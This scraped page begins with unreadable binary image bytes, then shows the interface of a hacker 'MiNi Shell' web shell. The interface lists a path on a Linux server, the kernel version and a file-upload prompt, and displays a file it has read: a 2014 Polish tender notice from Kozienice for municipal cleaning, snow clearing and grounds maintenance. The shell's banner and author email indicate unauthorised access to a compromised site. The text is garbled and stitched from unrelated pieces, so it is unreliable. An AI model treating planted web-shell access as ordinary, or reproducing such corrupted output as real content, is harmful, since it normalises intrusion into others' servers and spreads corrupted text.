JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20141216/411748-N-2014.html

<p class="kh_header"><b>Kozienice: Bieżące utrzymanie czystości, porządku, zieleni na nieruchomościach gruntowych administrowanych, zarządzanych przez Zamawiającego.</b><br>
<b>Numer ogłoszenia: 411748 - 2014; data zamieszczenia: 16.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarządzanie Mieniem Komunalnym Gminy Kozienice , ul. Radomska 36, 26-900 Kozienice, woj. mazowieckie, tel. 48 614 43 88, faks 48 614 43 88.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:// www.zmkgk.bip.kozienice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie czystości, porządku, zieleni na nieruchomościach gruntowych administrowanych, zarządzanych przez Zamawiającego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 6.1.	Przedmiotem zamówienia jest świadczenie  usług w zakresie bieżącego utrzymania czystości, porządku i zieleni na nieruchomościach gruntowych  administrowanych, zarządzonych przez Zarządzanie Mieniem Komunalnym Gminy Kozienice.
1.Zakres rzeczowy obejmuje: 
a)Stałe utrzymanie porządku i czystości terenów przylegających do budynków oraz placów, chodników, jezdni,
b)Sprzątanie chodników, uliczek wewnątrzosiedlowych po całej szerokości, placów publicznych, dojazdów, ciągów pieszych, placów zabaw w tym - nawierzchni syntetycznej z płytek modułowych, dojść do budynków i altanek śmietnikowych,
c)Sprzątanie wszelkiego rodzaju zanieczyszczeń, zamiatanie, utrzymanie estetyki na terenach przyległych do budynków,
d)Usuwanie śmieci z koszy tzw. parkowych znajdujących się przed budynkami oraz przy chodnikach i na placach zabaw, usuwanie śmieci zalegających przy kontenerach na odpady, sprzątanie przyległego terenu do śmietnika,
e)Odśnieżanie, oczyszczanie, usuwanie skutków gołoledzi z użyciem piasku na: terenach przy budynkach, chodnikach, dojściach do śmietników oraz klatek schodowych w okresie zimowym, Przy obfitych opadach śniegu Wykonawca ma obowiązek rozpocząć oczyszczanie najpóźniej po 2 godzinach od powstania opadów śniegu, niezależnie od pory dnia czy nocy,
f)Stałe utrzymanie drożności odpływu z chodników wody z topniejącego śniegu, lodu lub innych zabrudzeń,
g)Utrzymanie czystości na terenach zielonych poprzez: powierzchniowe czyszczenie terenów zieleni z wszelkiego rodzaju zanieczyszczeń w tym zbieranie odpadów foliowych, papierowych i innych nieczystości, usuwanie połamanych drzew i gałęzi, pielęgnacja drzew i krzewów  poprzez ich formowanie i odmładzanie,
h)Koszenie traw na terenach zielonych, grabienie traw i liści,
i)Wyrównywanie - grabienie na placach zabaw nawierzchni piaszczystych, żwirowych z częstotliwością wynikającą z bieżących potrzeb.
2.Dodatkowe warunki wykonawcze: 
a)Roboty należy wykonywać w takiej porze dnia aby nie powodować utrudnień oraz uciążliwej emisji hałasu.
b)Koszenie traw na terenach zielonych Wykonawca zobowiązany jest zrealizować w terminie do 14 dni od momentu otrzymania pisemnego zlecenia. Pisemne zlecenie Zamawiającego na wykonanie koszenia terenów zielonych, dostarczane będzie do siedziby Wykonawcy lub przekazywane będzie przez Zamawiającego - osobie  nadzorującej ze strony wykonawcy wskazanej w umowie.  Za dzień otrzymania pisemnego zlecenia, uznaje się datę wpływu pisemnego zlecenia do siedziby Wykonawcy lub datę przyjęcia zlecenia przez osobę nadzorującą ze strony Wykonawcy. 
c)W trakcie wykonywania przedmiotu zamówienia Wykonawca ma obowiązek przekazywać  każdego dnia roboczego do godz. 14.00 meldunek z zakresu wykonanych prac.
d)Wykonawca zobowiązany jest do poniesienia wszystkich kosztów związanych z wykonaniem przedmiotu zamówienia.
e)Wykonawca zobowiązany jest do wykonania zleconych prac z należytą starannością bez konieczności zgłaszania telefonicznie interwencji.
f)Wykonawca zobowiązany jest do wykonania prac z zachowaniem należytej ostrożności tak aby nie naruszać elementów małej architektury, nasadzeń, ogrodzeń.
g)Wykonawca odpowiada za uszkodzenie urządzeń sąsiadujących z wykonywanymi usługami.
h)W wypadku uszkodzeń lub zniszczeń budowli w toku realizacji usług Wykonawca zobowiązuje się do ich naprawienia i doprowadzenia do ich stanu poprzedniego.
i) Usuwanie i transport na składowisko nieczystości i odpadów, które są wynikiem czynności  opisanych w pkt.1.
3.Ponadto na wykonawcy ciążą obowiązki wynikające z:
ustawą z dnia 14.12.2012 r. o odpadach ( Dz. U. z 2013r., poz. 21 z późniejszymi zmianami ),
ustawą z dnia 13.09.1996 r. o utrzymaniu czystości i porządku w gminach ( Dz. U. z 2013r., poz. 1399 z późniejszymi zmianami),
ustawą z dnia 27.04.2001 r. - Prawo ochrony środowiska ( Dz. U. z  2013r., poz. 1232 z późniejszymi zmianami ).
Wykonawca ponosi skutki prawne za ewentualne szkody osób trzecich spowodowane wykonywaniem przedmiotu zamówienia.
Uwaga:
Wyszczególnione rodzaje usług nie stanowią katalogu zamkniętego.
Przedmiot zamówienia oraz  wymagania dotyczące jego wykonania  szczegółowo zostały  opisane w  rozdziale II SIWZ - Opis przedmiotu zamówienia. Wykaz nieruchomości objętych zamówieniem stanowi załącznik Nr 9/1. W ramach realizacji przedmiotu zamówienia wykonawca będzie świadczył usługi zgodnie       z obowiązującymi przepisami oraz zgodnie z wymaganiami Zamawiającego określonymi we wzorze umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.62.00.00-9, 77.31.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania  do wykonania niniejszego zamówienia Zamawiający nie określa szczegółowo sposobu oceny tego warunku. 
Oceny spełnienia warunku udziału w postępowaniu w tym zakresie Zamawiający dokona na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu
zgodnie z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał  a w przypadku świadczeń okresowych lub ciągłych również wykonuje nadal  w sposób należyty :
co najmniej jedną usługę w ramach zawartej 1 umowy /kontraktu/ polegającą na porządkowaniu w okresie letnim i zimowym co najmniej powierzchni placów i ulic  i chodników i terenów zielonych o łącznej pow. min. 50 000 m2, które były wykonywane przez nie mniej niż 12 kolejnych miesięcy i załączy dowody określające, czy  usługi te zostały wykonane lub są wykonywane w sposób należyty (w/wym warunek musi być spełniony w ramach 1 zadania).                                                                                              
Uwaga: 
W przypadku wykazania doświadczenia usługami wykonywanymi Zamawiający żąda, żeby Wykonawca wykazał, nie później niż na dzień składania ofert wykonanie części usług polegającą na porządkowaniu w okresie letnim i zimowym co najmniej powierzchni placów i ulic i chodników i terenów zielonych o łącznej pow. min. 50 000 m2.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że:
Dysponuje co najmniej następującym potencjałem technicznym:
a)jedną zamiatarką mechaniczną o szerokości zamiatania min. 1,2 m - max 1,8 m, b)jeden pług odśnieżny o szerokości odśnieżania min. 2,3 m, do odśnieżania chodników, c) jedną piaskarkę do posypywania chodników zawieszaną lub przyczepianą  do ciągnika rolniczego, d)jedną kosiarką samobieżną, e)	dwie kosy spalinowe, f)jeden samochód ciężarowy do wywozu odpadów, g) jeden ciągnik     z przyczepą.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że:
Dysponuje co najmniej 1 osobą pełniącą funkcję koordynatora usługi, posiadającą co najmniej 2 letnie  doświadczenie (wykonywane w sposób ciągły) zawodowe w zakresie kierowania zespołem sprzątającym,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - zamawiający nie określa sposobu oceny tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	stosowne Pełnomocnictwo do reprezentacji - jeżeli osoby podpisujące ofertę działają na podstawie pełnomocnictwa - musi zostać ono złożone jako część oferty w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza,
b)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. jako konsorcjum) - dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia	
c)	pisemne zobowiązanie innych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia ( np. wg wzoru - załącznik nr 6 do SIWZ lub inny równoważny dokument- patrz uwaga do punktu 8.1.2.1 SIWZ ), jeżeli wykonawca przy wykazywaniu spełniania warunków udziału w postępowaniu, o których mowa w pkt 8.1.1. SIWZ powołuje się na potencjał innych podmiotów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Czas wykonania koszenia terenów zielonych administrowanych, zarządzanych  przez  zamawiającego od momentu otrzymania pisemnego zlecenia - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Gdy wystąpiły takie okoliczności, których nie można było przewidzieć w chwili zawarcia umowy i na które strony nie miały wpływu. Gdy nastąpi zmiana stawki podatku VAT przez władzę ustawodawczą w trakcie trwania umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku akcyzowego.
Gdy nastąpi zmiana przepisów prawnych mających wpływ na realizacje umowy, 
w szczególności na jej zakres. Gdy zajdzie konieczność zmiany osób sprawujących funkcję koordynatora  nad prawidłową realizacją usług na inne legitymujące się co najmniej równoważnym doświadczeniem o których mowa w siwz.
W przypadku zmiany zasobu zarządzanego i administrowanego przez Zamawiającego. W przypadku zmiany zasad finansowania inwestycji. 
Gdy nastąpi zmiana formy organizacyjno - prawnej lub siedziby Wykonawcy.
Gdy zajdzie potrzeba rozszerzenia zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy, o ile posłużenie się podwykonawcą doprowadzi do poprawienia jakości lub skrócenia  czasu wykonania poszczególnych zleceń i zgłoszeń. W przypadku innych zmian spowodowanych przyczynami zewnętrznymi niezależnymi od Zamawiającego oraz wykonawcy skutkującymi niemożliwością wykonania prac na warunkach określonych w umowie ( w szczególności protestami mieszkańców). Gdy zmiana jest korzystna dla zamawiającego np.: gdy obniży to koszty wykonania usługi albo skróci czas realizacji poszczególnych zleceń, zgłoszeń. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron, wyrażoną w formie pisemnego aneksu - pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:// www.zmkgk.bip.kozienice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarządzanie Mieniem Komunalnym Gminy Kozienice 
Adres: 26-900 Kozienice, ul. Radomska 36, Sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.12.2014 godzina 09:45, miejsce: Zarządzanie Mieniem Komunalnym Gminy Kozienice 
Adres: 26-900 Kozienice, ul. Radomska 36, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com